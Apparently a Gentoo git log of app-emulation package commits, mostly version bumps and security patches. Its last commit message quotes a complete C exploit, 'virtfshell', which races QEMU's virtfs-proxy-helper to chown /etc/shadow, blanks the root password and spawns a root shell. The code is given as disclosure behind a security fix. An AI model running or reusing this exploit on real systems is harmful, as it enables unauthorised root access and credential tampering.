Commit message | Author | Age | Files | Lines
* app-emulation/xen: revbump to vn. 4.6.0-r5 | Ian Delaney | 2016-01-03 | 2 | -0/+191
    wrt security patch in the gentoo bug
    Gentoo bug: #569554
    Package-Manager: portage-2.2.26
* app-emulation/open-vm-tools: Fix building with latest glibmm/libsigc++ (#570418) | Pacho Ramos | 2016-01-01 | 1 | -0/+4
    Package-Manager: portage-2.2.26
* app-emulation/wine: Resolve bug #566036 for 9999 | NP-Hardass | 2015-12-31 | 2 | -2/+2
    Package-Manager: portage-2.2.25
* app-emulation/xen-tools: Make use of new python_gen_impl_dep function | Michał Górny | 2015-12-31 | 6 | -8/+8
* Remove hardmasked for removal packages | Pacho Ramos | 2015-12-31 | 3 | -33/+0
* clean unused use flag | Michael Sterrett | 2015-12-29 | 1 | -1/+0
    Package-Manager: portage-2.2.24
* old | Michael Sterrett | 2015-12-29 | 5 | -220/+0
    Package-Manager: portage-2.2.24
* app-emulation/lxd: remove old | Erik Mackdanz | 2015-12-28 | 6 | -257/+0
    Package-Manager: portage-2.2.26
* app-emulation/lxd: bump to 0.25 | Erik Mackdanz | 2015-12-28 | 6 | -0/+266
    Package-Manager: portage-2.2.26
* app-emulation/docker-swarm: version bump to 1.0.1 | Zac Medico | 2015-12-27 | 2 | -0/+38
    Package-Manager: portage-2.2.26
* app-emulation/docker-machine: version bump to 0.5.4 | Zac Medico | 2015-12-27 | 2 | -0/+42
    Package-Manager: portage-2.2.26
* app-emulation/libvirt-glib: version bump to 0.2.3 | Matthias Maier | 2015-12-27 | 2 | -0/+54
    Thanks to Dessa for pointing this out.
    Package-Manager: portage-2.2.26
* app-emulation/xen: add msg in pkg_postinst to all vns. 4.5 4.5 re xen-syms | Ian Delaney | 2015-12-27 | 4 | -0/+17
    Prompt from user in bug #552424 to make install of /boot/xen-syms optional,
    done by informing user via msg in pkg_postinst to do this using INSTALL_MASK
    Gentoo bug: #552424
    Package-Manager: portage-2.2.24
* app-emulation/virt-manager: drop version 1.3.1 (bug 569644) | Matthias Maier | 2015-12-27 | 2 | -106/+0
    Version 1.3.1 had a too restrictive check for x11-libs/vte:2.91.
    Fixed by upstream in 1.3.2
    Gentoo-Bugs: 569644
    Package-Manager: portage-2.2.26
* app-emulation/libvirt: version bump to 1.3.0, provide service file for virtlogd | Matthias Maier | 2015-12-27 | 6 | -3/+428
    - Bump to version 1.3.0 (including backport for CVE-2015-5313)
    - Add runscript for freshly introduced virtlogd
    Gentoo-Bugs: 569526, 568860, 567152
    Package-Manager: portage-2.2.26
* app-emulation/libvirt: Install all docs under /usr/share/doc/${PF} (bug 569526) | Matthias Maier | 2015-12-27 | 2 | -4/+2
    Gentoo-Bug: 569526
    Package-Manager: portage-2.2.26
    Signed-off-by: Matthias Maier <tamiko@gentoo.org>
* app-emulation/virt-manager: Version bump | Manuel Rüger | 2015-12-26 | 2 | -0/+106
    Package-Manager: portage-2.2.26
* app-emulation/vice: ppc stable wrt bug #568078 | Agostino Sarubbo | 2015-12-26 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="ppc"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/spice-protocol: ppc stable wrt bug #566156 | Agostino Sarubbo | 2015-12-26 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="ppc"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/cloud-init: x86 stable wrt bug #568596 | Agostino Sarubbo | 2015-12-25 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="x86"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/vice: x86 stable wrt bug #568078 | Agostino Sarubbo | 2015-12-25 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="x86"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/xen-tools: clean vn. 4.5.2-r1 re sec bug #566842 | Ian Delaney | 2015-12-23 | 2 | -467/+0
    Package-Manager: portage-2.2.24
* app-emulation/xen: clean vn. 4.5.2-r1 re sec bug #566842 | Ian Delaney | 2015-12-23 | 2 | -182/+0
    Package-Manager: portage-2.2.24
* app-emulation/virt-manager: Version bump | Manuel Rüger | 2015-12-22 | 2 | -0/+106
    Gentoo-Bug: #568154
    Package-Manager: portage-2.2.26
* app-emulation/libvirt-glib: remove old versions 0.2.0, 0.2.1 | Matthias Maier | 2015-12-22 | 3 | -109/+0
    Package-Manager: portage-2.2.26
* app-emulation/libvirt: remove vulnerable 1.2.18 (CVE-2015-5313, bug #568870) | Matthias Maier | 2015-12-22 | 4 | -663/+0
    This is a cleanup for CVE-2015-5313 bug 568870.
    Gentoo-Bugs: 568870
    Package-Manager: portage-2.2.26
* app-emulation/libvirt: x86 stable wrt bug #568870 | Agostino Sarubbo | 2015-12-22 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="x86"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/libvirt: amd64 stable wrt bug #568870 | Agostino Sarubbo | 2015-12-22 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="amd64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/xen-tools: amd64 stable wrt bug #566842 | Agostino Sarubbo | 2015-12-22 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="amd64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/libvirt: remove vuln. 1.2.(20|21) (CVE-2015-5313, bug #568870) | Matthias Maier | 2015-12-22 | 3 | -763/+0
    This is a cleanup for CVE-2015-5313 bug 568870.
    Gentoo-Bugs: 568870
    Package-Manager: portage-2.2.26
* app-emulation/libvirt: security fix for 1.2.21 (CVE-2015-5313, bug #568870) | Matthias Maier | 2015-12-22 | 2 | -1/+2
    Apply fix for CVE-2015-5313 to 1.2.21:

    A path-traversal flaw was found in the way the libvirt daemon handled
    file-system names for storage volumes. A libvirt user with privileges to
    create storage volumes and without privileges to create and modify domains
    could possibly use this flaw to escalate their privileges.

    Gentoo-Bug: 568870
    Package-Manager: portage-2.2.26
* app-emulation/cloud-init: amd64 stable wrt bug #568596 | Agostino Sarubbo | 2015-12-21 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="amd64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* virtualbox packages: Removed old. | Lars Wendler | 2015-12-21 | 12 | -1139/+0
    Package-Manager: portage-2.2.26
    Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* virtualbox packages: Bump to version 5.0.12 | Lars Wendler | 2015-12-21 | 12 | -0/+1139
    Package-Manager: portage-2.2.26
    Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* app-emulation/qemu: disable libgcrypt usage #568856 | Mike Frysinger | 2015-12-20 | 2 | -0/+12
* clean out unused use flags | Michael Sterrett | 2015-12-17 | 1 | -2/+0
    Package-Manager: portage-2.2.24
* clean old | Michael Sterrett | 2015-12-17 | 6 | -316/+0
    Package-Manager: portage-2.2.24
* app-emulation/qemu: drop versions <2.4.1-r2 | Mike Frysinger | 2015-12-17 | 38 | -9482/+0
* app-emulation/qemu-guest-agent: version bump to 2.5.0 | Mike Frysinger | 2015-12-17 | 2 | -0/+89
* app-emulation/qemu: version bump to 2.5.0 | Mike Frysinger | 2015-12-17 | 2 | -0/+646
* app-emulation/xen: revbumps to vns. 4.5.2-r3, 4.6.0-r4 | Ian Delaney | 2015-12-17 | 3 | -0/+376
    security patches added of xsa 164,165,166 re security Bug 567962
    Gentoo bug: #567962
    Package-Manager: portage-2.2.24
* app-emulation/xen-tools: revbumps to vns. 4.5.2-r3, 4.6.0-r5 | Ian Delaney | 2015-12-17 | 3 | -0/+937
    security patches added of xsa 164,165,166, and those affecting qemu (4)
    from xsa-155 re security Bug 567962
    Gentoo bug: #567962
    Package-Manager: portage-2.2.24
* app-emulation/qemu: x86 stable wrt bug #567828 | Agostino Sarubbo | 2015-12-16 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="x86"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/qemu: amd64 stable wrt bug #567828 | Agostino Sarubbo | 2015-12-16 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="amd64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/qemu: add upstream fixes for #567828 #568214 | Mike Frysinger | 2015-12-15 | 3 | -0/+750
* app-emulation/qemu: drop virtfs-proxy-helper fcaps from all versions #568226 | Mike Frysinger | 2015-12-15 | 9 | -36/+0
* app-emulation/crossover-bin: Bump to 15.0.0 | Richard Yao | 2015-12-14 | 2 | -0/+142
    Package-Manager: portage-2.2.20.1
    Signed-off-by: Richard Yao <ryao@gentoo.org>
* app-emulation/vice: amd64 stable wrt bug #568078 | Agostino Sarubbo | 2015-12-14 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="amd64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/xen: amd64 stable wrt bug #566842 | Agostino Sarubbo | 2015-12-14 | 1 | -1/+1
    Package-Manager: portage-2.2.24
    RepoMan-Options: --include-arches="amd64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/qemu: critical security fix | Jason A. Donenfeld | 2015-12-14 | 4 | -0/+2495
    The virtfs-proxy-helper program is not a safe binary to give caps.

    The following exploit code demonstrates the vulnerability:

    ~=~=~=~= snip ~=~=~=~=
    /* == virtfshell ==
     *
     * Some distributions make virtfs-proxy-helper from QEMU either SUID or
     * give it CAP_CHOWN fs capabilities. This is a terrible idea. While
     * virtfs-proxy-helper makes some sort of flimsy check to make sure
     * its socket path doesn't already exist, it is vulnerable to TOCTOU.
     *
     * This should spawn a root shell eventually on vulnerable systems.
     *
     * - zx2c4
     *   2015-12-12
     *
     *
     * zx2c4@thinkpad ~ $ lsb_release -i
     * Distributor ID: Gentoo
     * zx2c4@thinkpad ~ $ ./virtfshell
     * == Virtfshell - by zx2c4 ==
     * [+] Beginning race loop
     * [+] Chown'd /etc/shadow, elevating to root
     * [+] Cleaning up
     * [+] Spawning root shell
     * thinkpad zx2c4 # whoami
     * root
     *
     */

    #include <stdio.h>
    #include <sys/wait.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/inotify.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <signal.h>

    static int it_worked(void)
    {
        struct stat sbuf = { 0 };
        stat("/etc/shadow", &sbuf);
        return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
    }

    int main(int argc, char **argv)
    {
        int fd;
        pid_t pid;
        char uid[12], gid[12];

        sprintf(uid, "%d", getuid());
        sprintf(gid, "%d", getgid());

        printf("== Virtfshell - by zx2c4 ==\n");

        printf("[+] Beginning race loop\n");

        while (!it_worked()) {
            fd = inotify_init();
            unlink("/tmp/virtfshell/sock");
            mkdir("/tmp/virtfshell", 0777);
            inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
            pid = fork();
            if (!pid) {
                close(0);
                close(1);
                close(2);
                execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
                _exit(1);
            }
            read(fd, 0, 0);
            unlink("/tmp/virtfshell/sock");
            symlink("/etc/shadow", "/tmp/virtfshell/sock");
            close(fd);
            kill(pid, SIGKILL);
            wait(NULL);
        }

        printf("[+] Chown'd /etc/shadow, elevating to root\n");

        system( "cp /etc/shadow /tmp/original_shadow;"
                "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
                "cat /tmp/modified_shadow > /etc/shadow;"
                "su -c '"
                " echo [+] Cleaning up;"
                " cat /tmp/original_shadow > /etc/shadow;"
                " chown root:root /etc/shadow;"
                " rm /tmp/modified_shadow /tmp/original_shadow;"
                " echo [+] Spawning root shell;"
                " exec /bin/bash -i"
                "'");
        return 0;
    }